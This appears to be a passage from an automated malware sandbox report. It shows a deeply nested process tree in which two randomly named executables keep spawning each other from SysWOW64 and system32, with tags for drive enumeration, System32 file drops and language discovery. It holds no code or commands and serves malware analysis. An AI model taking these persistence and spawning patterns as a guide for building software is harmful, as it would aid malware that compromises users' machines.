        
        PID:11748
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        92⤵
        
        PID:12588
        
        C:\Windows\SysWOW64\yvdnDE4\bYmZ0jx.exe
        
        C:\Windows\system32\yvdnDE4\bYmZ0jx.exe
        90⤵
        
        PID:11652
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        91⤵
        
        PID:12388
        
        C:\Windows\SysWOW64\yvdnDE4\bYmZ0jx.exe
        
        C:\Windows\system32\yvdnDE4\bYmZ0jx.exe
        89⤵
        
        PID:11644
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        90⤵
        
        PID:12380
        
        C:\Windows\SysWOW64\yvdnDE4\bYmZ0jx.exe
        
        C:\Windows\system32\yvdnDE4\bYmZ0jx.exe
        88⤵
        
        PID:11584
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        89⤵
        
        PID:12304
        
        C:\Windows\SysWOW64\yvdnDE4\bYmZ0jx.exe
        
        C:\Windows\system32\yvdnDE4\bYmZ0jx.exe
        87⤵
        
        PID:11560
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        88⤵
        
        PID:12252
        
        C:\Windows\SysWOW64\yvdnDE4\bYmZ0jx.exe
        
        C:\Windows\system32\yvdnDE4\bYmZ0jx.exe
        86⤵
        
        PID:11520
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        87⤵
        
        PID:12232
        
        C:\Windows\SysWOW64\yvdnDE4\bYmZ0jx.exe
        
        C:\Windows\system32\yvdnDE4\bYmZ0jx.exe
        85⤵
        
        PID:11500
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        86⤵
        
        PID:12224
        
        C:\Windows\SysWOW64\yvdnDE4\bYmZ0jx.exe
        
        C:\Windows\system32\yvdnDE4\bYmZ0jx.exe
        84⤵
        
        PID:11384
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        85⤵
        Enumerates connected drives
        
        PID:11916
        
        C:\Windows\SysWOW64\yvdnDE4\bYmZ0jx.exe
        
        C:\Windows\system32\yvdnDE4\bYmZ0jx.exe
        83⤵
        
        PID:11364
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        84⤵
        
        PID:11892
        
        C:\Windows\SysWOW64\yvdnDE4\bYmZ0jx.exe
        
        C:\Windows\system32\yvdnDE4\bYmZ0jx.exe
        82⤵
        
        PID:10076
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        83⤵
        Enumerates connected drives
        
        PID:11712
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        84⤵
        
        PID:15644
        
        C:\Windows\SysWOW64\yvdnDE4\bYmZ0jx.exe
        
        C:\Windows\system32\yvdnDE4\bYmZ0jx.exe
        81⤵
        
        PID:11232
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        82⤵
        
        PID:11688
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        83⤵
        
        PID:15624
        
        C:\Windows\SysWOW64\yvdnDE4\bYmZ0jx.exe
        
        C:\Windows\system32\yvdnDE4\bYmZ0jx.exe
        80⤵
        Drops file in System32 directory
        System Location Discovery: System Language Discovery
        
        PID:11076
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        81⤵
        
        PID:11476
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        82⤵
        
        PID:15400
        
        C:\Windows\SysWOW64\yvdnDE4\bYmZ0jx.exe
        
        C:\Windows\system32\yvdnDE4\bYmZ0jx.exe
        79⤵
        System Location Discovery: System Language Discovery
        
        PID:10984
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        80⤵
        
        PID:11336
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        81⤵
        
        PID:15196
        
        C:\Windows\SysWOW64\yvdnDE4\bYmZ0jx.exe
        
        C:\Windows\system32\yvdnDE4\bYmZ0jx.exe
        78⤵
        
        PID:10920
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        79⤵
        
        PID:11300
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        80⤵
        
        PID:15132
        
        C:\Windows\SysWOW64\yvdnDE4\bYmZ0jx.exe
        
        C:\Windows\system32\yvdnDE4\bYmZ0jx.exe
        77⤵
        
        PID:10908
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        78⤵
        
        PID:11308
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        79⤵
        
        PID:15160
        
        C:\Windows\SysWOW64\yvdnDE4\bYmZ0jx.exe
        
        C:\Windows\system32\yvdnDE4\bYmZ0jx.exe
        76⤵
        
        PID:10840
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        77⤵
        
        PID:11268
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        78⤵
        
        PID:15036
        
        C:\Windows\SysWOW64\yvdnDE4\bYmZ0jx.exe
        
        C:\Windows\system32\yvdnDE4\bYmZ0jx.exe
        75⤵
        
        PID:10820
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        76⤵
        Enumerates connected drives
        
        PID:11220
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        77⤵
        
        PID:14976
        
        C:\Windows\SysWOW64\yvdnDE4\bYmZ0jx.exe
        
        C:\Windows\system32\yvdnDE4\bYmZ0jx.exe
        74⤵
        
        PID:10720
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        75⤵
        
        PID:11112
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        76⤵
        
        PID:14716
        
        C:\Windows\SysWOW64\yvdnDE4\bYmZ0jx.exe
        
        C:\Windows\system32\yvdnDE4\bYmZ0jx.exe
        73⤵
        System Location Discovery: System Language Discovery
        
        PID:10712
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        74⤵
        
        PID:11088
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        75⤵
        
        PID:14656
        
        C:\Windows\SysWOW64\yvdnDE4\bYmZ0jx.exe
        
        C:\Windows\system32\yvdnDE4\bYmZ0jx.exe
        72⤵
        
        PID:10696
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        73⤵
        
        PID:11056
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        74⤵
        
        PID:14676
        
        C:\Windows\SysWOW64\yvdnDE4\bYmZ0jx.exe
        
        C:\Windows\system32\yvdnDE4\bYmZ0jx.exe
        71⤵
        System Location Discovery: System Language Discovery
        
        PID:10684
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        72⤵
        
        PID:11016
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        73⤵
        
        PID:14556
        
        C:\Windows\SysWOW64\yvdnDE4\bYmZ0jx.exe
        
        C:\Windows\system32\yvdnDE4\bYmZ0jx.exe
        70⤵
        
        PID:10568
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        71⤵
        
        PID:10892
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        72⤵
        
        PID:14348
        
        C:\Windows\SysWOW64\yvdnDE4\bYmZ0jx.exe
        
        C:\Windows\system32\yvdnDE4\bYmZ0jx.exe
        69⤵
        System Location Discovery: System Language Discovery
        
        PID:10548
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        70⤵
        
        PID:10868
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        71⤵
        
        PID:12948
        
        C:\Windows\SysWOW64\yvdnDE4\bYmZ0jx.exe
        
        C:\Windows\system32\yvdnDE4\bYmZ0jx.exe
        68⤵
        
        PID:10508
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        69⤵
        
        PID:10828
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        70⤵
        
        PID:14152
        
        C:\Windows\SysWOW64\yvdnDE4\bYmZ0jx.exe
        
        C:\Windows\system32\yvdnDE4\bYmZ0jx.exe
        67⤵
        
        PID:10492
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        68⤵
        
        PID:10812
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        69⤵
        
        PID:14052
        
        C:\Windows\SysWOW64\yvdnDE4\bYmZ0jx.exe
        
        C:\Windows\system32\yvdnDE4\bYmZ0jx.exe
        66⤵
        
        PID:10284
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        67⤵
        
        PID:10596
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        68⤵
        
        PID:13512
        
        C:\Windows\SysWOW64\yvdnDE4\bYmZ0jx.exe
        
        C:\Windows\system32\yvdnDE4\bYmZ0jx.exe
        65⤵
        
        PID:10292
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        66⤵
        System Location Discovery: System Language Discovery
        
        PID:10624
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        67⤵
        
        PID:13528
        
        C:\Windows\SysWOW64\yvdnDE4\bYmZ0jx.exe
        
        C:\Windows\system32\yvdnDE4\bYmZ0jx.exe
        64⤵
        
        PID:10124
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        65⤵
        
        PID:10424
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        66⤵
        
        PID:12952
        
        C:\Windows\SysWOW64\yvdnDE4\bYmZ0jx.exe
        
        C:\Windows\system32\yvdnDE4\bYmZ0jx.exe
        63⤵
        System Location Discovery: System Language Discovery
        
        PID:10096
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        64⤵
        
        PID:10400
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        65⤵
        
        PID:12908
        
        C:\Windows\SysWOW64\yvdnDE4\bYmZ0jx.exe
        
        C:\Windows\system32\yvdnDE4\bYmZ0jx.exe
        62⤵
        Enumerates connected drives
        
        PID:10020
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        63⤵
        
        PID:10264
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        64⤵
        
        PID:12396
        
        C:\Windows\SysWOW64\yvdnDE4\bYmZ0jx.exe
        
        C:\Windows\system32\yvdnDE4\bYmZ0jx.exe
        61⤵
        
        PID:10000
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        62⤵
        
        PID:10248
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        63⤵
        
        PID:12340
        
        C:\Windows\SysWOW64\yvdnDE4\bYmZ0jx.exe
        
        C:\Windows\system32\yvdnDE4\bYmZ0jx.exe
        60⤵
        Enumerates connected drives
        
        PID:9892
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        61⤵
        
        PID:10160
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        62⤵
        
        PID:11940
        
        C:\Windows\SysWOW64\yvdnDE4\bYmZ0jx.exe
        
        C:\Windows\system32\yvdnDE4\bYmZ0jx.exe
        59⤵
        Enumerates connected drives
        
        PID:9864
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        60⤵
        Drops file in System32 directory
        
        PID:10144
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        61⤵
        
        PID:11884
        
        C:\Windows\SysWOW64\yvdnDE4\bYmZ0jx.exe
        
        C:\Windows\system32\yvdnDE4\bYmZ0jx.exe
        58⤵
        
        PID:9840
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        59⤵
        
        PID:10088
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        60⤵
        
        PID:11848
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        61⤵
        
        PID:15856
        
        C:\Windows\SysWOW64\yvdnDE4\bYmZ0jx.exe
        
        C:\Windows\system32\yvdnDE4\bYmZ0jx.exe
        57⤵
        System Location Discovery: System Language Discovery
        
        PID:9820
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        58⤵
        
        PID:10068
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        59⤵
        
        PID:11820
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        60⤵
        
        PID:15816
        
        C:\Windows\SysWOW64\yvdnDE4\bYmZ0jx.exe
        
        C:\Windows\system32\yvdnDE4\bYmZ0jx.exe
        56⤵
        
        PID:9728
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        57⤵
        
        PID:9968
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        58⤵
        
        PID:11548
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        59⤵
        
        PID:15456
        
        C:\Windows\SysWOW64\yvdnDE4\bYmZ0jx.exe
        
        C:\Windows\system32\yvdnDE4\bYmZ0jx.exe
        55⤵
        
        PID:9716
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        56⤵
        
        PID:9960
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        57⤵
        
        PID:11488
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        58⤵
        
        PID:15428
        
        C:\Windows\SysWOW64\yvdnDE4\bYmZ0jx.exe
        
        C:\Windows\system32\yvdnDE4\bYmZ0jx.exe
        54⤵
        Drops file in System32 directory
        
        PID:9588
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        55⤵
        
        PID:9828
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        56⤵
        
        PID:11288
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        57⤵
        
        PID:15060
        
        C:\Windows\SysWOW64\yvdnDE4\bYmZ0jx.exe
        
        C:\Windows\system32\yvdnDE4\bYmZ0jx.exe
        53⤵
        System Location Discovery: System Language Discovery
        
        PID:9552
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        54⤵
        Drops file in System32 directory
        
        PID:9792
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        55⤵
        
        PID:2148
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        56⤵
        
        PID:15016
        
        C:\Windows\SysWOW64\yvdnDE4\bYmZ0jx.exe
        
        C:\Windows\system32\yvdnDE4\bYmZ0jx.exe
        52⤵
        
        PID:9440
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        53⤵
        
        PID:9660
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        54⤵
        
        PID:11036
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        55⤵
        
        PID:14588
        
        C:\Windows\SysWOW64\yvdnDE4\bYmZ0jx.exe
        
        C:\Windows\system32\yvdnDE4\bYmZ0jx.exe
        51⤵
        
        PID:9404
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        52⤵
        
        PID:9640
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        53⤵
        
        PID:11028
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        54⤵
        
        PID:14604
        
        C:\Windows\SysWOW64\yvdnDE4\bYmZ0jx.exe
        
        C:\Windows\system32\yvdnDE4\bYmZ0jx.exe
        50⤵
        
        PID:9276
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        51⤵
        
        PID:9464
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        52⤵
        Enumerates connected drives
        
        PID:10756
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        53⤵
        
        PID:13964
        
        C:\Windows\SysWOW64\yvdnDE4\bYmZ0jx.exe
        
        C:\Windows\system32\yvdnDE4\bYmZ0jx.exe
        49⤵
        
        PID:8516
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        50⤵
        
        PID:9380
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        51⤵
        
        PID:10584
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        52⤵
        
        PID:13412
        
        C:\Windows\SysWOW64\yvdnDE4\bYmZ0jx.exe
        
        C:\Windows\system32\yvdnDE4\bYmZ0jx.exe
        48⤵
        
        PID:9180
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        49⤵
        
        PID:9360
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        50⤵
        
        PID:10604
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        51⤵
        
        PID:13484
        
        C:\Windows\SysWOW64\yvdnDE4\bYmZ0jx.exe
        
        C:\Windows\system32\yvdnDE4\bYmZ0jx.exe
        47⤵
        
        PID:9132
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        48⤵
        
        PID:9284
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        49⤵
        System Location Discovery: System Language Discovery
        
        PID:10432
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        50⤵
        
        PID:12916
        
        C:\Windows\SysWOW64\yvdnDE4\bYmZ0jx.exe
        
        C:\Windows\system32\yvdnDE4\bYmZ0jx.exe
        46⤵
        
        PID:9040
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        47⤵
        
        PID:8528
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        48⤵
        
        PID:10352
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        49⤵
        
        PID:12720
        
        C:\Windows\SysWOW64\yvdnDE4\bYmZ0jx.exe
        
        C:\Windows\system32\yvdnDE4\bYmZ0jx.exe
        45⤵
        System Location Discovery: System Language Discovery
        
        PID:9024
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        46⤵
        Enumerates connected drives
        
        PID:9208
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        47⤵
        
        PID:10272
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        48⤵
        
        PID:12536
        
        C:\Windows\SysWOW64\yvdnDE4\bYmZ0jx.exe
        
        C:\Windows\system32\yvdnDE4\bYmZ0jx.exe
        44⤵
        System Location Discovery: System Language Discovery
        
        PID:8916
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        45⤵
        
        PID:9096
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        46⤵
        
        PID:10168
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        47⤵
        Enumerates connected drives
        
        PID:12032
        
        C:\Windows\SysWOW64\yvdnDE4\bYmZ0jx.exe
        
        C:\Windows\system32\yvdnDE4\bYmZ0jx.exe
        43⤵
        
        PID:8892
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        44⤵
        
        PID:9104
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        45⤵
        
        PID:10152
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        46⤵
        
        PID:11900
        
        C:\Windows\SysWOW64\yvdnDE4\bYmZ0jx.exe
        
        C:\Windows\system32\yvdnDE4\bYmZ0jx.exe
        42⤵
        
        PID:8824
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        43⤵
        
        PID:8996
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        44⤵
        
        PID:9984
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        45⤵
        
        PID:11604
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        46⤵
        
        PID:15528
        
        C:\Windows\SysWOW64\yvdnDE4\bYmZ0jx.exe
        
        C:\Windows\system32\yvdnDE4\bYmZ0jx.exe
        41⤵
        
        PID:8816
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        42⤵
        
        PID:9004
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        43⤵
        
        PID:9992
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        44⤵
        
        PID:11620
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        45⤵
        
        PID:15544
        
        C:\Windows\SysWOW64\yvdnDE4\bYmZ0jx.exe
        
        C:\Windows\system32\yvdnDE4\bYmZ0jx.exe
        40⤵
        
        PID:8632
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        41⤵
        
        PID:8804
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        42⤵
        
        PID:9668
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        43⤵
        
        PID:11048
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        44⤵
        
        PID:14596
        
        C:\Windows\SysWOW64\yvdnDE4\bYmZ0jx.exe
        
        C:\Windows\system32\yvdnDE4\bYmZ0jx.exe
        39⤵
        
        PID:8616
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        40⤵
        System Location Discovery: System Language Discovery
        
        PID:8784
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        41⤵
        
        PID:9692
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        42⤵
        
        PID:11124
        
